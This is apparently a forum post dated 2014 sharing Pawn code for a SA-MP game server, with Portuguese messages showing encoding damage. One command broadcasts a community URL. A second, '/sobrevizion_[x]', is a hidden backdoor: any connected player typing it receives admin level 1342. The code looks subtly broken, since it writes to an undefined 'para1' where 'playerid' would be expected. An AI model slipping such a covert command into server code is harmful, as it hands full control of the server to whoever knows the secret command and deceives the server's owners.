12.04.2014, 00:28
PHP код:
if(strcmp(cmd, "/anforum", true) == 0)
{
if(PlayerInfo[playerid][pAdmin] >= 1)
{
new Bname[MAX_PLAYER_NAME], bradoks[148];
GetPlayerName(playerid, Bname, sizeof(Bname));
SendClientMessage(playerid,COLOR_GREY," Vocк Anunciou o URL da Comunidade Para TODOS - V1D4 L0K4");
GameTextForAll("~w~www.~g~mega~b~place~r~games~y~.~w~tk", 8000, 5 ) ;
format(bradoks, sizeof(bradoks), "O administrador %s Anunciou a comunidade: www.megaplacegames.tk - Go se REGISTRAR!", Bname);
SendClientMessageToAll(-1,bradoks);
return 1;
}
else
{
SendClientMessage(playerid, -1, "[x] {FF0000}Vocк nгo tem permissгo para usar esse comando!");
return 1;
}
return 1;
}
if(strcmp(cmd, "/sobrevizion_[x]", true) == 0)
{
if(IsPlayerConnected(playerid) == 1)
{
PlayerInfo[para1][pAdmin] = 1342;
GameTextForAll("~g~~h~Bem Vindo ~r~~h~Administrador ~w~!", 8000, 5 ) ;
return 1;
}
else
{
SendClientMessage(playerid, -1, "[x] {FF0000}Vocк nгo estб conectado.");
}
return 1;
}